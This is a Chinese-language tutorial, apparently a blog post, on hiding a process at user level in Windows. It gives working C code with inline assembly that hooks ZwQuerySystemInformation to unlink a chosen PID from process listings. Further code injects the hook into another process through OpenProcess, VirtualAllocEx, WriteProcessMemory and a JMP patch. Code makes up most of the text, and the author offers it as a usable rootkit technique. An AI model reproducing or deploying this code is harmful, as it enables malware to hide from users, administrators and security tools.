ring3 dll hide
ZwQuerySystemInformation(SystemProcessInformation,SystemInformation,Length,ReturnLength);
pSystemProcesses = (PSYSTEM_PROCESS_INFORMATION)SystemInformation;
while (TRUE){
printf("进程PID: %d\n",pSystemProcesses->InheritedFromProcessId);
if (!pSystemProcesses->NextEntryOffset) {
break;
}
pSystemProcesses = (PSYSTEM_PROCESS_INFORMATION)((char *)pSystemProcesses + pSystemProcesses->NextEntryOffset);
}
当是我们需要隐藏的进程的时候我们可以通过增加NextEntryOffset的长度或者设置NextEntryOffset长度为0来隐藏进程。所以我们可以构造以下类似代码:
NTSTATUS
NTAPI
HOOK_ZwQuerySystemInformation(
IN SYSTEM_INFORMATION_CLASS SystemInformationClass,
OUT PVOID SystemInformation,
IN ULONG SystemInformationLength,
OUT PULONG ReturnLength OPTIONAL
)
{
NTSTATUS ntStatus;
PSYSTEM_PROCESSES pSystemProcesses=NULL,Prev;
_asm{
push ebx
push ReturnLength
push SystemInformationLength
push SystemInformation
push SystemInformationClass
call ZwQuerySystemInformationProxy //让原来函数执行完成,只有这样函数才能返回我们需要的数据然后在数据里进行修改
mov ntStatus,eax
pop ebx
}
if (NT_SUCCESS(ntStatus) && SystemInformationClass==SystemProcessesAndThreadsInformation){
pSystemProcesses = (PSYSTEM_PROCESSES)SystemInformation;
while (TRUE){
if (pSystemProcesses->;ProcessId==0x12345678){ //如果是我们需要隐藏的PID就进行数据修改
if (pSystemProcesses->NextEntryDelta){
//当我们需要隐藏的进程后面还有进程时
//越过我们自己进程让NextEntryDelta直接指向下一个数据块
Prev->NextEntryDelta += pSystemProcesses->NextEntryDelta;
}else{
//当我们进程处于最后一个数据那么我们就把上一个数据结构的NextEntryDelta置0
//这时系统在遍历我们进程时就不会发现了
Prev->NextEntryDelta=0;
}
break;
}
if (!pSystemProcesses->NextEntryDelta) {
break;
}
Prev=pSystemProcesses;
pSystemProcesses = (PSYSTEM_PROCESSES)((char *)pSystemProcesses + pSystemProcesses->NextEntryDelta);
}
}
return ntStatus;
}
我们为了不添加一个多余的DLL所以必须是以Shellcode方式注入到目标进程,但是要这样写完整的shellcode确实有点麻烦,我们可以取巧利用程序来实现。
我们把函数内需要重定位的地方全部使用__asm来完成比如上面的
_asm{
push ebx
push ReturnLength
push SystemInformationLength
push SystemInformation
push SystemInformationClass
call ZwQuerySystemInformationProxy //让原来函数执行完成,只有这样函数才能返回我们需要的数据然后在数据里进行修改
mov ntStatus,eax
pop ebx
}
调用绝对地址来实现,这样就不需要重定位了。这样我们可以把这个函数拷贝到目标进程了,再进行下目标地址的计算就ok了。所以有类似下面的实现代码:
BOOLEAN SetHook(DWORD dwProcessId,DWORD dwHideId)
{
BOOLEAN bRet=FALSE;
DWORD OldProtect;
DWORD dwCodeStart,dwCodeEnd,dwCodeSize;
BYTE HookCode[5]={0xE9,0,0,0,0};
HANDLE hProcess=NULL;
PVOID RemoteAllocBase=NULL;
DWORD dwFunAddress;
PUCHAR pBuffer;
dwCodeStart = GetFunAddress((PUCHAR)FunStart);
dwCodeEnd = GetFunAddress((PUCHAR)FunEnd);
dwCodeSize = dwCodeEnd-dwCodeStart;
hProcess = OpenProcess(PROCESS_ALL_ACCESS,
FALSE,
dwProcessId
);
if (hProcess){
RemoteAllocBase = VirtualAllocEx(hProcess,
NULL,
dwCodeSize,
MEM_COMMIT,
PAGE_EXECUTE_READWRITE
);
if (RemoteAllocBase){
printf("\t申请内存地址:0x%x\n",RemoteAllocBase);
g_lpRemoteAllocBase = RemoteAllocBase;
if (ZwQuerySystemInformation){
bRet=VirtualProtect((PVOID)dwCodeStart,
dwCodeSize,
PAGE_EXECUTE_READWRITE,
&OldProtect
);
if (bRet){
memcpy((PVOID)dwCodeStart,ZwQuerySystemInformation,5); //这里可以在本进程中取备份代码也可以在远程进程中取一般正常情况是一样的
*(DWORD *)(dwCodeStart+6)=(DWORD)ZwQuerySystemInformation;//这里不需要用特征定位,因为肯定是在第六个字节开始的地方
*HookCode=0xE9;
dwFunAddress = GetFunAddress((PUCHAR)HOOK_ZwQuerySystemInformation);
dwFunAddress -= dwCodeStart;
dwFunAddress += (DWORD)RemoteAllocBase; //计算HOOK_ZwQuerySystemInformation在目标进程中的地址
printf("\tHOOK_ZwQuerySystemInformation内存地址:0x%x\n",dwFunAddress);
*(DWORD *)&HookCode[1]=dwFunAddress-5-(DWORD)ZwQuerySystemInformation;
dwFunAddress = GetFunAddress((PUCHAR)HOOK_ZwQuerySystemInformation);
for (pBuffer=(PUCHAR)dwFunAddress;
pBuffer<(PUCHAR)dwFunAddress+(dwCodeEnd-dwFunAddress);
pBuffer++
)
{
if (*(DWORD *)pBuffer==0x12345678){
*(DWORD *)pBuffer = dwHideId;
break;
}
}
VirtualProtect((PVOID)dwCodeStart,
dwCodeSize,
PAGE_EXECUTE_READWRITE,
&OldProtect
);
}
}
bRet=WriteProcessMemory(hProcess,
RemoteAllocBase,
(PVOID)dwCodeStart,
dwCodeSize,
NULL
);
if (bRet){
bRet=WriteProcessMemory(hProcess,
ZwQuerySystemInformation,
HookCode,
5,
NULL
);
}
}
CloseHandle(hProcess);
}
return bRet;
}
